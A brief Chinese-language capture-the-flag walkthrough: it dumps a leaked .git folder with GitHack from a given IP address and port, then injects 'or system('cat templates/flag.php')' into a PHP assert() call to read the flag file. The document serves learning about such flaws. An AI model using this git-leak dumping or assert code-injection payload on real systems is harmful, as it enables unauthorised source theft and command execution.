1-其中Bootstrap是推特的前端开源工具包,看到git先尝试访问.git文件夹
2-git信息泄露,用GitHack爬下来源文件

3-python2 GitHack.py http://220.249.52.133:56698/.git/
4-查看index文件,要知道assert会把传入的字符串参数当作代码执行,or 如果前面的为真则不会向后执行,在此文件中,第12行assert还会执行
strpos('templates/abc') or system('cat templates/flag.php'); //


5-